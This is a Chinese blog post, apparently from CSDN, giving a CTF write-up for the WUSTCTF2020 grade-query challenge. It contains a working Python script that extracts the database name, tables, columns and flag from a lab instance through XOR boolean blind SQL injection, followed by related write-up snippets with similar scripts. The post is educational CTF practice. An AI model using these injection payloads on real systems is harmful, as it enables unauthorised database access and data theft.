[WUSTCTF2020]颜值成绩查询

最新推荐文章于 2024-06-10 21:32:02 发布
最新推荐文章于 2024-06-10 21:32:02 发布
阅读量648 收藏 1
点赞数 1
分类专栏: CTF 复现 初学 文章标签: sql 数据库 mysql wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mrs_H/article/details/120815403
版权
博主分享了一次在查询页面利用异或盲注技术成功破解SQL注入的过程,通过逐步试探字符ASCII值实现数据库名暴露出旗子flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

最近一直在重新系统性的返回去学sql注入,题也做了一些,但是大部分题目都是靠着师傅们的wp做完的,实在是让我有点尴尬。但是这道题就不一样了,比较简单,简单到我自己一个人也能完成的程度。其实以前是学过sql注入的,但是总是在比赛上打不动大比赛sql注入的题目,这次返回学习也算是一个查漏补缺吧。

正文

首先进入环境可以看到下面这个页面。
在这里插入图片描述
是一个查询页面,上面的stunum是一个可变参数。最多可以变化到4.
简单的注入尝试一下
请添加图片描述
请添加图片描述
额。。。没什么效果,感觉后面的查询参数根本就没传进去。
尝试了报错注入,但是没什么回显。那就把报错注入排除了,感觉还是盲注。
看见上面这个参数还是1,突然想到之前有一种注入是通过1^0^1进行盲注。(异或盲注)
准备尝试
请添加图片描述
请添加图片描述
感觉有机会,再试一下。
请添加图片描述
请添加图片描述
好,看来是确定了,现在就可以直接写脚本了

import requests
import time

def start_ascii():
    database_name = ""
    # table_name = ""
    # column_name = ""
    url = "http://b28e8021-691f-49de-8051-ba7c4afa17b8.node4.buuoj.cn:81/?stunum=1"
    for i in range(1,300):
        low = 32
        high = 128
        mid = (low + high)//2
        while(low < high):
            # payload = "^(ascii(substr((select(database())),%d,1))>%d)^1#"%(i,mid)
            # payload = "^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where((table_schema)=(database()))),%d,1))>%d)^1#" % (i, mid)
            # payload = "^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where((table_name)=('flag'))),%d,1))>%d)^1" % (i, mid)
            payload = "^(ascii(substr((select(group_concat(value))from(flag)),%d,1))>%d)^1" % (i, mid)
            res = requests.get(url + payload)
            if 'exists' in res.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high)//2
            # 跳出循环
        if mid == 32 or mid == 127:
            break
        database_name = database_name + chr(mid)
        # table_name = table_name + chr(mid)
        # column_name = column_name + chr(mid)
        print(database_name)

if __name__ == "__main__":
    start_ascii()

最终爆出flag
请添加图片描述

[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 715
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
[WUSTCTF2020]颜值成绩查询 -wp
freerats的博客
08-05 645
改变参数stunum发现页面会发生变化。 通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。 写脚本跑一下: import requests url='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php' flag='' for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
buu-[WUSTCTF2020]颜值成绩查询
qaq517384的博客
10-08 461
[WUSTCTF2020]颜值成绩查询 报了个session的错,先不管 id输1234都有不同回显且url变为/?stunum=1,5就变成用户不存在了 ?stunum=1^0 ?stunum=1^0 可以用异或盲注 import requests url='http://3a1493b4-eefb-4eed-bb52-c5e5cfc25f91.node4.buuoj.cn:81/?stunum=' flag='' for i in range(1,100): low = 32
[WUSTCTF2020]颜值成绩查询 布尔盲注
qq_37301470的博客
12-02 314
[WUSTCTF2020]颜值成绩查询 只有一个输入框,是sql注入题目 尝试输入1,2,3 可以发现是get方法提交的参数且是数字型 故用hackbar /?stunum=1 or 1=2 %23 student number not exists. 刚刚还可以查到现在查不到了判断存在过滤 尝试下发现是空格 上盲注脚本 import string import requests select=f"select/**/value/**/from/**/flag" ans="" for i in ran
[BUUOJ][WUSTCTF2020]颜值成绩查询 ---二分法
Y4tacker的博客
08-01 7544
import requests url = "http://93b7e81c-3dd4-4eaf-9ddf-8342b4e4bc7a.node3.buuoj.cn/?stunum=" result = "" i = 0 while True: i = i + 1 head = 32 tail = 127 while head < tail: mid = (head + tail) >> 1 # payload = "
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 852
[WUSTCTF2020]颜值成绩查询(布尔注入)
BUUCTF:[WUSTCTF2020]颜值成绩查询
Nobody Anyone
04-07 1623
SQL盲注 2^if(ascii(mid(database(),1,1))>0,0,1); 先fuzz测试查看有没有过滤了什么,这里过滤了空格,但是我们可以收用/**/来分隔sql语句 先看我根据我的一篇文章布尔型盲注python脚本(功能超级完整)改的脚本 import requests def ascii_str(): # 生成库名表名字符所在的字符列表字典 str_li...
[WUSTCTF2020]颜值成绩
shinygod的博客
04-09 481
知识点:布尔盲注 当我们输入1,2,3,4的时候都有回显,但是当输入5的时候会回显 判断布尔盲注,测试一波 这种显示不存在 1'and length(database()) >1# 当用异或注入的时候显示正确1^1^1,并回显Hi admin,这样我们就可以由此来盲注。 import re import requests import string url = "http://ebb62726-0fba-430e-bf27-5e7214c31577.node4.buuoj.cn:81/" f
[WUSTCTF2020]颜值成绩查询1
alwtj的博客
06-10 426
又试了试报错闭合,联合注入之类的,结果输出的都是student number not exists.测试了一下从1输到了5,第五个显示 student number not exists.开局一个输入框,输入number查询成绩,还有2行报错,典型的sql注入题~没有出错,说明payload构建成功,那就开始写python代码~这段代码用了二分查找,开始执行~输入1 0 0 / 1 0 0。没有出错,说明空格被过滤了~获得flag,游戏结束~构造一下payload。
WUSTCTF2020misc
最新发布
01-14
### WUST CTF 2020 Misc 类别题目解析 #### 黄金体验镇魂曲 在该比赛中,选手需寻找特定格式的字符串作为标志(flag),例如 `wctf2020{y0u_kn0w_th3_rule5}` 并提交以获取分数[^2]。 #### 盲文转换挑战 对于名为`RE Cr0ssFun`的任务,给定的是一个看似无规律字符组合而成的字符串:`wctf2020{y$0$u_f$1$n$d$_M$e$e$e$e$e}`。通过分析可以发现这实际上是一个经过特殊编码处理后的Flag形式。去除其中多余的符号后可得正确答案[^1]。 #### PDF 文件中的秘密消息 存在一道涉及PDF文档的操作题——`Find me`。此题目的关键是利用图像编辑软件如Photoshop来揭示隐藏于图片内的文字信息,最终获得形似 `wctf2020{th1s_1s_@_pdf_and_y0u_can_use_phot0sh0p}` 的Flag[^3]。 #### 文本挖掘技巧应用实例 有一道关于从大量文本数据中提取有用信息的问题,在给出的文件夹内有一个叫做 Timothy 的子目录。通过对这些文本内容进行检索操作(比如使用 grep 工具),能够快速定位到含有 Flag 关键字的部分,进而得到完整的 Flag 字符串[^4]。 #### 实际环境互动实验 最后还有一项较为特别的任务叫作 Welcome 。参与者被提示要关注“三人”的概念,并执行随附的一个 exe 可执行程序。当向计算机展示三张不同人的照片时,便会触发显示 Flag 的机制[^5]。 ```python import re def extract_flag(text): pattern = r'wctf2020\{(.*?)\}' match = re.search(pattern, text) if match: return f"wctf2020{{{match.group(1)}}}" else: return "No flag found" text_samples = [ "blind text wctf2020{y$0$u_f$1$n$d$_M$e$e$e$e$e}", "gold experience requiem gives us the flag as wctf2020{y0u_kn0w_th3_rule5}", "hidden message inside pdf is revealed to be wctf2020{th1s_1s_@_pdf_and_y0u_can_use_phot0sh0p}", ] for sample in text_samples: print(extract_flag(sample)) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值